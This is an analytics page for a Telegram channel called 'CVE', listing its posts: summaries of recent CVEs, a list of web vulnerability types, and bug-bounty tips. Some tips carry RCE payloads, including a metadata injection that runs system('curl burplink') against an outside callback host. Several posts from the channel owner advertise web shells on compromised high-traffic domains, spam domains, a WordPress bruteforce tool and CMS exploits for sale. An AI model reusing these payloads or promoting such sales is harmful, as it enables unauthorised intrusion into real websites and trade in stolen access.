Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
CVE
Kanalga Telegram’da o‘tish
🔐 CVE | Cyber Vulnerabilities Exchange Group dedicated to sharing and discussing CVEs, zero-days, critical vulnerabilities, exploits, PoCs, and technical analyses of offensive and defensive security. 🟢 Think. Break. Secure. BY: @Mm_fit #cve
Ko'proq ko'rsatishMamlakat belgilanmaganTexnologiyalar & Aralashmalar21 779
4 019
Obunachilar
+1324 soatlar
+987 kunlar
+32530 kunlar
Ma'lumot yuklanmoqda...
O'xshash kanallar
Ma'lumot yo'q
Muammo bormi? Iltimos, sahifani yangilang yoki bizning qo'llab-quvvatlash boshqaruvchimizga murojaat qiling>.
Taglar buluti
Kirish va chiqish esdaliklari
---
---
---
---
---
---
Obunachilarni jalb qilish
Iyun '26
Iyun '26
+165
4 kanalda
May '26
+460
8 kanalda
Get PRO
Aprel '26
+694
38 kanalda
Get PRO
Mart '26
+1 043
20 kanalda
Get PRO
Fevral '26
+1 142
14 kanalda
Get PRO
Yanvar '26
+648
7 kanalda
| Sana | Obunachilarni jalb qilish | Esdaliklar | Kanallar | |
| 16 Iyun | +7 | |||
| 15 Iyun | +13 | |||
| 14 Iyun | +12 | |||
| 13 Iyun | +11 | |||
| 12 Iyun | +13 | |||
| 11 Iyun | +8 | |||
| 10 Iyun | +24 | |||
| 09 Iyun | +24 | |||
| 08 Iyun | +5 | |||
| 07 Iyun | +5 | |||
| 06 Iyun | +6 | |||
| 05 Iyun | +6 | |||
| 04 Iyun | +9 | |||
| 03 Iyun | +14 | |||
| 02 Iyun | +4 | |||
| 01 Iyun | +4 |
Kanal postlari
CVE-2026-5118
The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured defaultuserrole setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration.
| 2 | Hey Hunter's,
DarkShadow is here back again!
🖥 100 Web Vulnerabilities, categorized into various types : 😀
⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
⚡ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
⚡ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
⚡ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
⚡ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
⚡ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
⚡ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
⚡ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF
⚡ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
⚡ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
Let me know i there any vulnerability i missed?! | 566 |
| 3 | CVE-2026-9082
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection.
This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10. | 895 |
| 4 | CVE-2026-41651
PackageKit is a a D-Bus abstraction layer that allows the user to manage packages in a secure way using a cross-distro, cross-architecture API. PackageKit between and including versions 1.0.2 and 1.3.4 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition on transaction flags that allows unprivileged users to install packages as root and thus leads to a local privilege escalation. This is patched in version 1.3.5.
A local unprivileged user can install arbitrary RPM packages as root, including executing RPM scriptlets, without authentication. The vulnerability is a TOCTOU race condition on transaction->cached_transaction_flags combined with a silent state-machine guard that discards illegal backward transitions while leaving corrupted flags in place. Three bugs exist in src/pk-transaction.c:
1. Unconditional flag overwrite (line 4036.. | 1 243 |
| 5 | CVE-2026-46300 | 1 412 |
| 6 |  Flesh Shell 😎 🔥
DM @Mm_fit | 1 580 |
| 7 |  new shells 😎
DM 👉 @Mm_fit | 1 |
| 8 | CVE-2026-45185
Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS closenotify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code. | 1 585 |
| 9 | CVE-2026-33824
Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network. | 1 628 |
| 10 | Hacking a Bug Bounty Platform: JWT Forgery, SSTI & Python Import Hijacking to Root
In this video, we exploit an exposed Git repository, forge JWT tokens, abuse SSTI for code execution, and leverage hijacking to gain root ...
https://youtu.be/4BzZS4ualn0 | 1 752 |
| 11 |  😄 Large quantity of Shell available 😎
Customer who wants best high quality Shell 😎
✅ High Traffic Domain
✅ High DA/PA Domain
✅ High DR Domain
✅ Hacklink Market Network Domain
✅ Domain for spam
DM 👉 @Mm_fit 🦊
Channel https://t.me/cve0day | 1 901 |
| 12 | CVE-2025-59536
Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable to Code Injection due to a bug in the startup trust dialog implementation. Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to the latest version. This issue is fixed in version 1.0.111. | 1 703 |
| 13 |  +1Hey Hunter's,
DarkShadow is here back again!
file upload extension bypass for RCE ❌
metadata injection for RCE ✅
File upload vulnerability not just bypassing extension, metadata can be exploited. you can try like:
{"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"}
guy's if you really love to read then show your love and react❤️
and don't forget to follow me x.com/darkshadow2bd
#bugbounty #bugbountytips #rce | 1 651 |
| 14 | CVE-2026-42945
NGINX Plus and NGINX Open Source have a vulnerability in the ngxhttprewritemodule module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR ) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 1 667 |
| 15 |  🟢 This month I'm giving you all a gift! All my quality tools + list will be 50% off! 🔥
✔️ Bruteforce WordPress= 50% OFF
✔️ Themes WP exploit= 50% OFF
✔️ Laravel exploit= 50% OFF
✔️ Joomla exploit= 50 % OFF
Serious buyers call me privately
DM 👉 @Mm_fit 🌩
⏳ Limited time offer ⏳ | 1 861 |
| 16 | CVE-2025-70849
Arbitrary File Upload in podinfo thru 6.9.0 allows unauthenticated attackers to upload arbitrary files via crafted POST request to the /store endpoint. The application renders uploaded content without a restrictive Content-Security-Policy (CSP) or adequate Content-Type validation, leading to Stored Cross-Site Scripting (XSS). | 1 749 |
| 17 | New Videoo: Built a real AI-powered Bug Bounty Agent from scratch using Claude Code, Kali Linux & modern recon tooling 🚀
Automated recon, XSS/SQLi workflows, custom CLAUDE .md system, attack surface mapping & AI-assisted vulnerability hunting.
🎥 https://youtu.be/HRvw79AVoWI | 2 002 |
| 18 | CVE-2026-44578
Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5. | 1 771 |
| 19 |  +2Hye Hunter's,
DarkShadow is here back again!
Blind RCE in load model💀
if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily
2) system('id'); php functions for code injection
3) \"exec\" try blind rce using your burpcollab
Guys, you can join my new YouTube channel. I’ll upload regular videos here. YouTube.com/@darkshadow2bd
#rce # bugbounty # bugbountytips | 2 003 |
| 20 | CVE-2026-23918
Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol.
This issue affects Apache HTTP Server: 2.4.66.
Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 1 714 |
